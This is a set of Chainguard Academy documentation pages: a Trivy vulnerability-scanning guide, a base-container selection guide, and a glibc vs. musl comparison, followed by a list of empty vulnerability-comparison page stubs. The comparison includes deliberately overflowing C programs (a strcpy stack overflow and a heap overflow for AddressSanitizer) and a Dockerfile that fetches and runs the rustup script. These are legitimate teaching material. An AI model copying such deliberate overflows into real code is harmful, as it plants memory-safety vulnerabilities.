To try out the above command on a test Kubernetes cluster, first install Kind, a utility allowing Kubernetes to be run on your local machine. Once Kind is installed and accessible on your path, run the following to create a cluster:

kind create cluster --name test-cluster

Run the following to scan the new cluster with Trivy:

trivy k8s --report summary kind-test-cluster

When scanning clusters, requesting only summary output is recommended, as tables in more verbose output may not display correctly.

Scanning SBOMs

Trivy can both generate and scan SBOMs.

What is an SBOM? A Software Bill of Materials (SBOM) is a formally structured list of libraries, modules, licenses, and version information that make up any given piece of software. An SBOM provides a comprehensive view of the components contained in a software artifact, allowing for systematic analysis, investigation, and automation. SBOMs are most useful in identifying known vulnerabilities, surveying licenses for compliance, and making decisions based on project status or supplier trust. Read more about SBOMs on Chainguard Academy.

First, generate an SBOM file in CycloneDX format to scan:

trivy image -f cyclonedx -o results.cdx.json nginx

Trivy can scan this generated CycloneDX SBOM with the following:

trivy sbom results.cdx.json

By default, the sbom subcommand scans only for vulnerabilities. License scanning can be enabled using the --scanners license flag.

Some image providers, such as Chainguard, associate images with an SBOM attestation verifying that the image has not been tampered with since the time of creation. Trivy provides functionality to query attestations registered in the Rekor transparency log. To retrieve an SBOM attestation from a Rekor transparency log, set the --sbom-sources flag to rekor and provide the --rekor-url flag to the instance of the transparency log you wish to query against.
The following will perform a scan using the SBOM attestation for Chainguard’s nginx image as registered on the Rekor public server: trivy image --sbom-sources rekor --rekor-url https://rekor.sigstore.dev/ cgr.dev/chainguard/nginx Learn more about SBOMs and other output formats in the section on specifying output formats. Comprehending Trivy Output When run with default output and formatting, Trivy first prints a series of informational messages and warnings, then the name of the image and a one-line summary of the number and severity of issues found, and finally a table itemizing each issue. In this section, we’ll use an Alpine version of the official Python image as an example. Since we’re specifying an older version, you may encounter more CVEs when following the examples than are shown here, as CVEs will accumulate on an image over time. Scan the image with the following command: trivy image python:3.10.14-alpine3.20 You will receive output similar to the following: Interpreting Trivy Output The initial logging portion of Trivy’s output indicates which scanners are enabled and shows warnings if Trivy has an issue performing the scan. In the initial portion of its results output, Trivy summarizes information on the scanned artifact and gives an overview of known vulnerabilities. In the case of a scanned image, the output includes the image digest. This is a unique hash of the image that can be used as an identifier. Following the log, Trivy shows the name of the image and a count of issues by severity. Total: 8 (UNKNOWN: 0, LOW: 0, MEDIUM: 8, HIGH: 0, CRITICAL: 0) When scanning for vulnerabilities, this severity categorization sorts CVEs into four categories based on the Common Vulnerability Scoring System (CVSS). What is CVSS? CVEs are assigned numerical scores according to the Common Vulnerability Scoring System (CVSS), an open framework for communicating the severity of software vulnerabilities. CVSS scores correspond to four categories Critical (9.0-10.0) High (7.0-8.9) Medium (4.0-6.9) Low (0.1-3.9) In general, the higher the score, the more serious the vulnerability. Higher scores should be prioritized during CVE remediation. In the case of a license scan, Trivy instead uses its own assessment of the business risk posed by specific license clauses. Similarly, explosed secrets and misconfigurations have their own severity mapping as determined by Aqua Security. Itemized CVEs In addition to the log and brief summary, Trivy provides an itemized list of issues. By default, these are in table format, and for a vulnerability scan list the library, vulnerability, severity, status, installed version, and fixed version of each issue. Other types of scan list different data—for example, a license scan lists the package, license, license classification, and perceived severity of business risk. When scanning for vulnerabilities, information on fixed version can show which CVEs can be resolved by bumping the library version. Trivy also provides a short prose description of the nature of each issue. By default, Trivy’s table output is relatively verbose, and Trivy does not respect the traditional 80-character line limit on terminal output. See Output Formats and Verbosity for information on more granular control over Trivy’s output. Scanners Specifying Scanners Trivy can scan not only for known vulnerabilities, but also for misconfigurations, exposed secrets, and license risks. When scanning container images or filesystems, Trivy scans for vulnerabilities and exposed secrets by default. 
Individual scanners can be selected by passing a comma-separated list after the --scanners flag. To add a misconfigurations scan to an analysis of a container image:

trivy image --scanners vuln,misconfig,secret nginx

To recursively scan only for exposed secrets on a filesystem:

trivy fs --scanners secret .

This will perform a recursive scan of all files and folders in the current working directory.

License Scanning

Trivy provides an opinionated license scan that flags license clauses that may pose a business risk. To perform a license scan on a container image:

trivy image --scanners license nginx

By default, the Trivy license scan only looks at packages installed by managers such as apt or apk. To scan other files, add the --license-full flag:

trivy image --scanners license --license-full nginx

Using the --license-full flag will also show results for “loose” licenses, such as those provided as text files in project folders.

Output Formats and Verbosity

Specifying Output Formats

Trivy allows output in JSON, SARIF, CycloneDX, SPDX, SPDX-JSON, and GitHub formats. If no output or format flags are specified, Trivy first prints a series of informative messages and warnings to stderr and then prints a table of results to stdout.

The -q or --quiet flag suppresses the logging output normally printed to stderr. The following returns just the line summarizing the number and severity of issues:

trivy image -q nginx | grep Total:

Total: 173 (UNKNOWN: 2, LOW: 88, MEDIUM: 59, HIGH: 22, CRITICAL: 2)

The -f or --format flag specifies the output format, and the -o or --output flag specifies an output file. The following writes a JSON-formatted report to a results.json file:

trivy image -f json -o results.json nginx

Similarly, the following would write a report in SARIF format:

trivy image -f sarif -o results.sarif nginx

Other formats can be generated by passing the appropriate format type with the -f or --format flag.

Generating SBOMs

The CycloneDX, SPDX, and SPDX-JSON output formats are considered SBOMs, and can be scanned with the trivy sbom subcommand. The following command will generate an SBOM in CycloneDX format:

trivy image -f cyclonedx -o results.cdx.json nginx

See Scanning SBOMs for more on scanning these output formats.

Generating a Report from a Template

Trivy can generate reports in additional formats from user-contributed templates. To use templates, first clone the Trivy GitHub repository to your home folder:

git clone https://github.com/aquasecurity/trivy.git ~/.trivy

To generate a report using the HTML template, specify the path to the template in the cloned repository:

trivy image --format template --template "@.trivy/contrib/html.tpl" -o report.html nginx

This HTML output can be significantly more readable than Trivy’s default table output. Other template-based output formats can be browsed in the Trivy contrib directory.

Trivy Resources

The following resources may complement your use of Trivy:

- Trivy Documentation — Documentation on the latest version of Trivy
- Trivy Operator for Kubernetes — An operator to continuously scan a Kubernetes cluster for issues
- Trivy Announcements — News on Trivy from Aqua Security

---

### Choosing a Container for your Compiled Programs

URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/images-compiled-programs/compiled-programs/
Last Modified: April 7, 2025
Tags: Chainguard Containers, Product, Cheatsheet

When selecting the right base image for your application, there are a variety of factors to take into consideration.
For starters, it is critical that your application has all of the dependencies it needs to run. The ideal base image will contain the essential packages you need, while leaving out the ones you don’t. However, in practice, you will need to build upon your container images so they meet your specific needs, making it all the more important that you have a strong foundation. In this guide, we will explore a variety of Chainguard Containers which are suitable for different compiled applications. We will take a look at their availability and use-case differences so you can move closer to settling on the best base image for your specific needs. Available Container Containers wolfi-base The wolfi-base Chainguard Container is a minimal container image based on the Wolfi un-distro, a community-oriented Linux distribution created by Chainguard to facilitate image builds. The wolfi-base image contains busybox and apk-tools so that you can build your own packages for a custom image. It also supports glibc. What is Wolfi? Wolfi is a community Linux undistro created specifically for containers. This brings distroless to a new level, including additional features targeted at securing the software supply chain of your application environment: comprehensive SBOMs, signatures, daily updates, and timely CVE fixes. The following packages are included in the wolfi-base:latest Chainguard Containers: apk-tools busybox ca-certificates-bundle chainguard-baselayout glibc glibc-locale-posix ld-linux chainguard-base Paid Container In addition to the functionality of the wolfi-base Chainguard Container, chainguard-base reports as being a Chainguard Container, which scanners use to determine what security feeds to reference for vulnerabilities. Additionally, the chainguard-base container image provides access to vulnerability remediation SLAs to ensure your containers are always up-to-date with the latest releases and patches. The following packages are included in the chainguard-base:latest Chainguard Container: apk-tools busybox ca-certificates-bundle chainguard-baselayout glibc glibc-locale-posix ld-linux You can find the complete inventory of packages for the chainguard-base Chainguard Container at its listing on Chainguard’s registry. static The Chainguard static base image is a Wolfi-based image available in one variant with the :latest tag. The static image is extremely minimal and is not intended to be run directly. It is used to host stand-alone, static binaries, like those produced by compilers such as gcc, go, and rust. It does not contain any programs you can run out-of-the-box. You must add your own static binaries to the image, for example using a Dockerfile multi-stage build. The following packages are included in the static:latest Chainguard Container: ca-certificates-bundle chainguard-baselayout glibc-locale-posix tzdata wolfi-baselayout You can find more information about the static Chainguard Container at its listing on the Chainguard’s registry. glibc-dynamic The glibc-dynamic Chainguard Container is best suited for when you need to host dynamically linked binaries that depend on the C standard library. Like the static image, glibc-dynamic is intended to be used as a base image only, and you must add your own binaries to the image. The glibc-dynamic image is freely available in two variants: :latest and :latest-dev. The :latest-dev image adds additional packages which are not present in :latest to help facilitate application development. 
It is suggested to use the :latest image for production-facing purposes because of its smaller footprint. The following packages are included in the glibc-dynamic:latest Chainguard Container: ca-certificates-bundle chainguard-baselayout glibc glibc-locale-posix ld-linux libgcc libstdc++ wolfi-baselayout You can find more information about the glibc-dynamic Chainguard Container at its listing on Chainguard’s registry. cc-dynamic The cc-dynamic Chainguard Container is deprecated. It is suggested that you use the glibc-dynamic image instead, as it is designed to replace cc-dynamic. You can find more information about the cc-dynamic image, such as its packages and licensing information, on Chainguard’s registry. gcc-glibc The gcc-glibc Chainguard Container is best suited for building C applications which depend on glibc. There are two freely available variants of this image, :latest and :latest-dev. :latest-dev is a developer variant of the image which adds additional packages such as bash to facilitate the development process. In comparison to the static and glibc-dynamic Chainguard Containers, gcc-glibc is intended to be used to develop programs based on the C standard library, instead of simply hosting binaries. Because of this, it contains additional packages such as make, busybox, as well as gcc to compile programs. The following packages are included in the gcc-glibc:latest Chainguard Container: binutils build-base busybox ca-certificates-bundle gcc glibc You can find the complete inventory of packages for the gcc-glibc Chainguard Container at its listing on Chainguard’s registry. glibc-openssl Paid Container The glibc-openssl Chainguard Container is designed for C applications which depend on OpenSSL. It contains the openssl and openssl-provider-legacy packages to support this use-case. It comes in two variants,latest and latest-dev. As in the aforementioned images, latest is designed for deployment, while latest-dev contains additional packages to assist in program development such as a shell and package manager. The following packages are included in the glibc-openssl:latest Chainguard Container: ca-certificates-bundle chainguard-baselayout glibc glibc-locale-posix ld-linux openssl openssl-provider-legacy You can find the complete inventory of packages for the glibc-openssl Chainguard Container at its listing on Chainguard’s registry. What About musl? At the time of this writing, no Chainguard Containers come packaged with musl. Chainguard builds glibc-based container images because glibc is commonly used, which makes it easier for most developers to start consuming Chainguard Containers in their environments. Additionally, glibc is widely tested, making it a dependable choice for a C standard library implementation. As glibc is a well-established option, choosing to use glibc ensures more applications will be compatible with new images. Though musl is sometimes chosen because of its minimal footprint, Chainguard’s distroless approach based on Wolfi often results in a container image of comparable (or smaller) size than official musl based images. For more information, please refer to our glibc vs. musl article. Next Steps Understanding the differences between various Chainguard Containers allows you to make informed decisions about what images to choose for your compiled applications. You can check out our complete suite of Chainguard Containers on Chainguard’s registry. 
To learn more about using Chainguard Containers, head to the Chainguard Academy, where you can find documentation to help you start incorporating them into your workflow. Interested in learning more about adopting Chainguard Containers for your organization? Let’s get in touch!

---

### glibc vs. musl

URL: https://edu.chainguard.dev/chainguard/chainguard-images/about/images-compiled-programs/glibc-vs-musl/
Last Modified: April 7, 2025
Tags: Chainguard Containers, Product, cheatsheet

Over the years, various implementations of the C standard library — such as the GNU C library, musl, dietlibc, μClibc, and many others — have emerged with different goals and characteristics. These various implementations exist because the C standard library defines the required functionality for operating system services (such as file input/output and memory management) but does not specify implementation details. Among these implementations, the GNU C Library (glibc) and musl are among the most popular.

When developing Wolfi, the “undistro” on which all Chainguard Containers are built, Chainguard elected to have it use glibc instead of another implementation like musl. This conceptual article aims to highlight the differences between these two implementations within the context of Chainguard’s choice of using glibc over musl as the default implementation for the Wolfi undistro.

Note: Several sections of this guide present data about the differences between glibc and musl across various categories. You can recreate some of the examples used to find this data with the Dockerfiles and C program files hosted in the glibc-vs-musl directory of the Chainguard Academy Containers Demos repository.

High-level Differences between glibc and musl

The GNU C Library (glibc), driven by the GNU Project, was first released in 1988. glibc aims to provide a consistent interface for developers to help them write software that will work across multiple platforms. Today, glibc has become the default implementation of the C standard library across the majority of Linux distributions, including Ubuntu, Debian, Fedora, and even Chainguard’s Wolfi.

musl (pronounced “muscle”) was first released in 2011 as an alternative to glibc. The goal of musl is to strive for “simplicity, resource efficiency, attention to correctness, safety, ease of deployment, and support for UTF-8/multilingual text.” While not as widely used as glibc, some Linux distributions are based on musl, the most notable being Alpine Linux.

The following table highlights some of the main differences between glibc and musl.

| Criteria | glibc | musl |
| --- | --- | --- |
| First Release | 1988 | 2011 |
| License | GNU Lesser General Public License (LGPL) | MIT License (more permissive) |
| Binary Size | Larger Binaries | Smaller Binaries |
| Runtime Performance | Optimized for performance | Slower performance |
| Build Performance | Slower | Faster |
| Compatibility | POSIX Compliant + GNU Extensions | POSIX Compliant |
| Memory Usage | Efficient, higher memory usage | Potential performance issues with large memory allocations (e.g. Rust) |
| Dynamic Linking | Supports lazy binding, unloads libraries | No lazy binding, libraries loaded permanently |
| Threading | Native POSIX Thread Library, robust thread safety | Simpler threading model, not fully thread-safe |
| Thread Stack Size | Varies (2-10 MB), based on resource limits | Default size is 128K, can lead to crashes in some multithreaded code |
| Portability Issues | Fewer portability issues, widely used | Potential issues due to different system call behaviors |
| Python Support | Fast build times, supports precompiled wheels | Slower build times, often requires source compilation |
| NVIDIA Support | Supported by NVIDIA for CUDA | Not supported by NVIDIA for CUDA |
| Node.js Support | Tier 1 Support - Full Support | Experimental - May not compile or test suite may not pass |
| Debug Support | Several debug features available, such as sanitizers and profilers | Does not support sanitizers; limited profilers |
| DNS Implementation | Stable and well-supported | Historical reports of occasional DNS resolution issues |

Be aware that binaries are not compatible between Alpine and Wolfi. You should not attempt to copy Alpine binaries into a Wolfi-based container image.

Buffer Overflows

musl lacks default protection against buffer overflows, potentially causing undefined behavior, while glibc has built-in stack smashing protection. Running a vulnerable C program, glibc terminates with an error upon detecting an overflow, whereas musl allows it without warnings. Even using FORTIFY_SOURCE or -fstack-protector-all won’t prevent the overflow in musl. To illustrate buffer overflow, this section outlines running a vulnerable C program.

Creating the necessary files

First, create a working directory and cd into it.

mkdir ~/ovrflw-bffr-example && cd $_

Within this new directory, create a C program file called vulnerable.c:

#include <stdio.h>
#include <string.h>

int main() {
    char buffer[10];
    strcpy(buffer, "This is a very long string that will overflow the buffer.");
    printf("Buffer content: %s\n", buffer);
    return 0;
}

Next, create a Dockerfile named Dockerfile.musl to build a container image that will use musl as the C library implementation:

FROM alpine:latest
RUN apk add --no-cache gcc musl-dev
COPY vulnerable.c /vulnerable.c
RUN gcc -o /vulnerable_musl /vulnerable.c
CMD ["/vulnerable_musl"]

Then create a Dockerfile named Dockerfile.glibc for one that uses glibc:

# Build stage
FROM cgr.dev/chainguard/gcc-glibc AS build
WORKDIR /work
COPY vulnerable.c /work/vulnerable.c
RUN gcc vulnerable.c -o vulnerable_glibc

# Runtime stage
FROM cgr.dev/chainguard/glibc-dynamic
COPY --from=build /work/vulnerable_glibc /vulnerable_glibc
CMD ["/vulnerable_glibc"]

Next, you can build and test both of the new images.

Building and testing the container images

First build the image that will use musl:

docker build -t musl-test -f Dockerfile.musl .

Then build the image that will use glibc:

docker build -t glibc-test -f Dockerfile.glibc .

Then you can run the containers to test them. First run the musl-test container:

docker run --rm musl-test

Because musl does not prevent buffer overflows by default, it will allow the program to print This is a very long string that will overflow the buffer.:

Buffer content: This is a very long string that will overflow the buffer.
Next, test the glibc-test container:

docker run --rm glibc-test

glibc has built-in protection, so the output here will only let you know that the program was terminated:

*** stack smashing detected ***: terminated

Note: As mentioned previously, several of the remaining sections in this guide present data about the differences between glibc and musl across various categories. You can recreate some of these examples by following the same procedure of creating and testing container images based on the Dockerfiles and program files relevant to the example you’re exploring. You can find the appropriate files in the glibc-vs-musl directory of the Chainguard Academy Containers Demos repository.

Library and Binary Size

musl is significantly smaller than glibc. A primary reason for this is the two libraries’ differing approaches to adhering to the Portable Operating System Interface (POSIX). POSIX is a family of standards specified by the IEEE Computer Society to ensure consistent application behavior across different systems. musl adheres strictly to POSIX standards without incorporating additional extensions. glibc, while adhering to the POSIX standards, includes additional GNU-specific extensions and features. These extensions provide enhanced functionality and convenience, offering developers comprehensive tools. As an example, glibc provides support for Intel Control-flow Enforcement Technology (CET) when running on compatible hardware, providing control flow security guarantees at runtime — a feature that doesn’t exist on musl. However, this extensive functionality results in larger library sizes for glibc, with glibc’s function index listing over 1700 functions.

You might notice the decreased binary size for musl in a simple hello world program, whether linked statically or dynamically. As we can observe, since musl is much smaller than glibc, the statically linked binary is much smaller on Alpine. In the case of dynamic linking, the binary size is smaller for musl compared to glibc because of its simplified implementation of the dynamic linker, as outlined in the musl project’s design philosophy. The following table shows the difference in binary size of statically and dynamically linked hello world programs:

| Distro | Static linking | Dynamic linking |
| --- | --- | --- |
| Alpine (musl) binary size | 132K | 12K |
| Wolfi (glibc) binary size | 892K | 16K |

The smaller the binary size, the better the system is at debloating. You can find the Dockerfiles used in this setup in the binary-bloat directory of this guide’s examples repository.

Portability of Applications

The portability of an application refers to its ability to run on various hardware or software environments without requiring significant modifications. Developers can encounter portability issues when moving an application from one libc implementation to another. That said, Hyrum’s Law reminds us that achieving perfect portability is tough. Even when you design an application to be portable, it might still unintentionally depend on certain quirks of the environment or libc implementation.

One common portability issue is the smaller thread stack size used by musl. musl has a default thread stack size of 128K. glibc has varying stack sizes which are determined based on the resource limit, but they usually end up being 2-10 MB. This can lead to crashes with multithreaded code that assumes it has more than 2 MiB available for each thread (as it would on a glibc system). Such issues cause application crashes and potentially introduce new vulnerabilities, such as stack overflows.
Building from Source Performance

We compared the build-from-source performance of individual projects using the musl-gcc compiler toolchain used in Alpine and the gcc compiler toolchain used in Chainguard Wolfi. The following table shows the compilation times for Wolfi (glibc) and musl-gcc. The shorter the build time, the better the system’s performance.

| Repository | Wolfi compilation time | musl-gcc compilation time | Build successful with musl? |
| --- | --- | --- | --- |
| binutils-gdb | 18m 3.11s | * | No - C++17 features unsupported |
| Little-CMS | 29.44s | 24.13s | Yes |
| zlib | 11.48s | 9.37s | Yes |
| libpcap | 8.19s | 5.61s | Yes |
| gmp | 98.91s | 99.38s | Yes |
| openssl | 849.08s | 671.92s | Yes |
| curl | 92.33s | 79.15s | Yes |
| usrsctp | 55.39s | 48.38s | Yes |

You can find the Dockerfiles used in this setup in the build-comparison directory of this guide’s examples repository.

This table shows that musl-gcc has a lower compilation time than gcc on Wolfi for these projects when it can build the project successfully. musl-gcc fails to compile binutils-gdb because it conforms to POSIX standards, and binutils-gdb uses certain code features that are not conformant to these standards. The binutils project on the main branch fails to configure with native musl-gcc.

Python Builds

A common way to use existing Python packages is through precompiled binary wheels distributed from the Python Package Index (PyPI). Python wheels are typically built against glibc; because musl and glibc are different implementations of the C standard library, binaries compiled against glibc may not work correctly or at all on systems using musl. Due to this incompatibility, PyPI defaults to compiling from source on Alpine Linux. This implies you need to compile all the C source code required for every Python package. This also means you must determine every system library dependency needed to build the Python package from source. For example, you have to install the dependencies beforehand, using apk add <long list of dependencies>, before you perform pip install X.

The following table shows pip install times across Alpine (musl) and Wolfi (glibc). You can find the Dockerfiles used in this setup in the python-build-comparison directory of this guide’s examples repository.

| Python Package | Alpine (musl) | Wolfi (glibc) |
| --- | --- | --- |
| Matplotlib, pandas | 21m 30.196s | 0m 24.3s |
| tensorflow | 104m 21.904s | 2m 54.5s |
| pwntools | 29m 45.952s | 21.5s |

As this table shows, building from source results in long build times whenever you want to use Python-based applications with musl. Take the example of pwntools, a Python package that allows for the construction of exploits in software. When using glibc-based distros, the installation would be in the form pip3 install pwntools.
To install pwntools on a musl-based distro (such as Alpine), the Dockerfile is much more complicated:

FROM alpine:latest
# Prebuilt Alpine packages required to build from source
RUN apk add --no-cache musl-dev gcc python3 python3-dev libffi-dev libcap-dev make curl git pkgconfig openssl-dev bash alpine-sdk py3-pip
RUN python -m venv my-venv
RUN my-venv/bin/python -m pip install --upgrade pip
# Build from source cmake for latest version
RUN git clone https://github.com/Kitware/CMake.git && cd CMake && ./bootstrap && make && make install
ENV PATH=$PATH:/usr/local/bin
# Build from source Rust for latest version
RUN curl --proto '=https' --tlsv1.2 https://sh.rustup.rs -sSf > setup-rust.sh
RUN bash setup-rust.sh -y
ENV PATH=$PATH:/root/.cargo/bin
# Finally install pwntools
RUN pip3 install pwn

As this Dockerfile shows, pwntools requires a set of other packages. These in turn require the most up-to-date versions of Rust and cmake, which are not available in the default prebuilt packages in Alpine. You would have to build both from source before installing the Python dependencies and, finally, pwntools. Such dependencies have to be identified iteratively, through a process of trial and error, while building from source.

Runtime Performance

Time is critical. One common bottleneck occurs when allocating large chunks of memory repeatedly, and various reports have shown musl to be slower in this respect. Here we compare memory allocation performance between Wolfi and the latest Alpine. The benchmark uses JSON dumping, which is known to be highly memory intensive.

| Runtime | Alpine (musl) | Wolfi (glibc) |
|---------|---------------|---------------|
| Memory Allocations Benchmark | 102.25 sec | 51.01 sec |

This table highlights how excessive memory allocations can cause musl (used by Alpine) to perform up to 2x slower than glibc (used by Wolfi). A memory-intensive application needs to be wary of performance issues when migrating to the musl-based Alpine ecosystem. Technical details on why memory allocation (malloc) is slow can be found in this musl discussion thread.

Apart from memory allocations, multi-threading has also been problematic for musl, as shown in various GitHub issues and discussion threads. glibc provides a thread-safe system, while musl does not. The POSIX standard only requires stream operations to be atomic; it places no broader requirements on thread safety, so musl does not provide additional thread-safe features. This means unexpected behavior or race conditions can occur when multiple threads run concurrently. We used a Rust script (referenced from the GitHub issue) to test single-thread and multi-thread performance on Alpine (musl) and Wolfi (glibc). The next table shows performance benchmarks across single-threaded and multi-threaded Rust applications.

| Runtime | Alpine (musl) | Wolfi (glibc) |
|---------|---------------|---------------|
| Single-thread (avg of 5 runs) | 1735 ms | 1300 ms |
| Multi-thread (avg of 5 runs) | 1178 ms | 293 ms |

Alpine (musl) has the worse performance of the two, taking around 4x more time in the multi-threaded case when compared to Wolfi (glibc). As discussed previously, the real source of thread contention is musl's malloc implementation: multiple threads may allocate memory at once, and memory freed by one thread may be handed out to another, so the thread synchronization logic becomes a performance bottleneck.
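If you want to reproduce the allocator contention without the Rust script, a small C program along the following lines (a sketch, not part of the guide's repository) exercises the same pattern: several threads repeatedly allocating and freeing memory. The thread count and iteration count are arbitrary illustrative values; timing the same binary on Alpine (musl) and Wolfi (glibc), for example with time ./a.out, should show a gap of the kind described above.

```c
/* alloc_stress.c (hypothetical example): multi-threaded malloc/free churn
 * that exercises the allocator's internal locking.
 * Build with: gcc -O2 -pthread alloc_stress.c */
#include <pthread.h>
#include <stdio.h>
#include <stdlib.h>

#define THREADS 8
#define ITERATIONS 1000000L

static void *churn(void *arg) {
    (void)arg;
    for (long i = 0; i < ITERATIONS; i++) {
        /* Vary the size a little so the allocator cannot trivially
         * keep reusing a single cached chunk. */
        void *p = malloc((size_t)(64 + (i % 8) * 64));
        if (p == NULL)
            return NULL;
        free(p);
    }
    return NULL;
}

int main(void) {
    pthread_t tids[THREADS];
    for (int i = 0; i < THREADS; i++)
        pthread_create(&tids[i], NULL, churn, NULL);
    for (int i = 0; i < THREADS; i++)
        pthread_join(tids[i], NULL);
    puts("done");
    return 0;
}
```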
Experimental Warnings

Developers will most likely encounter musl through Alpine image variants, such as Node.js (node:alpine) and Go (golang:alpine). Both images carry similar warnings that they use musl libc instead of glibc, pointing users to this Hacker News comment thread for further discussion of the pros and cons of using Alpine-based images. Additionally, Node.js mentions in their building documentation: "For production applications, run Node.js on supported platforms only." musl and Alpine have experimental support status, whereas glibc has Tier 1 support. The Go image also mentions that Alpine is experimental and not officially supported: "This (Alpine) variant is highly experimental, and not officially supported by the Go project (see golang/go#19938 for details)."

Unsupported Debug Features

Certain applications rely on debug features for testing, including sanitizers (such as AddressSanitizer and ThreadSanitizer) and profilers (such as gprof), and these are not supported by musl. Sanitizers help debug and detect behaviors such as buffer overflows or dangling pointers. According to the musl wiki open issues, GCC and LLVM sanitizer implementations rely on libc internals and are incompatible with musl. Feature requests have been made in the LLVM sanitizer repository for musl support (check out this issue or this one for examples), but they have not been addressed.
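To make the sanitizer gap concrete, here is a minimal sketch (not from the guide's demo repository) of the kind of defect AddressSanitizer catches. On a glibc-based toolchain such as Wolfi's, compiling with -fsanitize=address and running the binary reports a heap-buffer-overflow; on a musl-based Alpine toolchain the sanitizer runtime is, per the musl wiki note above, generally not available.

```c
/* asan_demo.c (hypothetical example): a deliberate heap buffer overflow.
 * On a glibc-based toolchain: gcc -g -fsanitize=address asan_demo.c && ./a.out
 * AddressSanitizer reports a heap-buffer-overflow one byte past the allocation. */
#include <stdlib.h>

int main(void) {
    char *buf = malloc(8);
    if (buf == NULL)
        return 1;
    buf[8] = 'x';   /* write one byte past the end of the 8-byte allocation */
    free(buf);
    return 0;
}
```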
DNS issues

The Domain Name System (DNS) is the backbone of the internet. It can be thought of as the internet's phonebook, mapping easy-to-remember website names to internet protocol (IP) addresses. Multiple historical sources on the web have pointed out DNS issues when using musl-based distros. Some have pointed out issues with DNS over TCP (fixed in Alpine 3.18), and others have pointed out intermittent DNS resolution issues. Please refer to the following resources regarding musl's history with DNS:

- GitHub issue highlighting DNS Resolution in K3s using Alpine Linux
- The tragedy of gethostbyname - Blog
- Does Alpine resolve DNS properly? - Blog
- musl-libc - Alpine's Greatest Weakness - Blog

Conclusion

glibc and musl both serve well as C standard library implementations. Our goal for this article is to explain Chainguard's rationale for choosing glibc for Wolfi. We believe that's what made the most sense for our project, but you should continue your own research to determine whether one C implementation would suit your needs better than another. If you spot anything we've overlooked regarding glibc or musl, or have additional insights to contribute, please feel free to raise an issue in chainguard-dev/edu. We welcome further discussion on weaknesses in glibc, such as its larger codebase and complexity compared to musl. Additionally, insights into the intricacies of compiler toolchains for cross-compilation are welcome, especially when dealing with glibc and musl.

Finally, we encourage you to check out this additional set of articles and discussions about others' experiences with musl:

- Why I Will Never Use Alpine Linux Ever Again - Blog
- Why does musl make my Rust code so slow? - Blog
- GitHub issue: Investigate musl performance issues
- Using Alpine can make Python Docker builds 50× slower - Blog
- Comparison of C/POSIX standard library implementations for Linux - Blog
- GitHub issue: Officially support musl the same way glibc is supported
- GitHub issue: Musl as default instead of glibc
- GitHub issue: Convert docker builds to use debian/glibc images, away from docker alpine/musl

--- ### Vulnerability Comparison: bash URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/bash/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: busybox URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/busybox/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: curl URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/curl/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: deno URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/deno/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: dex URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/dex/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: dotnet-runtime URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/dotnet-runtime/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: dotnet-sdk URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/dotnet-sdk/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: etcd URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/etcd/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: git URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/git/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: go URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/go/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: gradle URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/gradle/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: haproxy URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/haproxy/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: jenkins URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/jenkins/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: kube-state-metrics URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/kube-state-metrics/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: mariadb URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/mariadb/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: maven URL:
https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/maven/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: memcached URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/memcached/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: minio URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/minio/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: minio-client URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/minio-client/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: nats URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/nats/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: nginx URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/nginx/ Last Modified: November 1, 2022 Tags: Reference, Chainguard Containers, Product --- ### Vulnerability Comparison: node URL: https://edu.chainguard.dev/chainguard/chainguard-images/vuln-comparison/node/ Last Modified: November 1, 2022 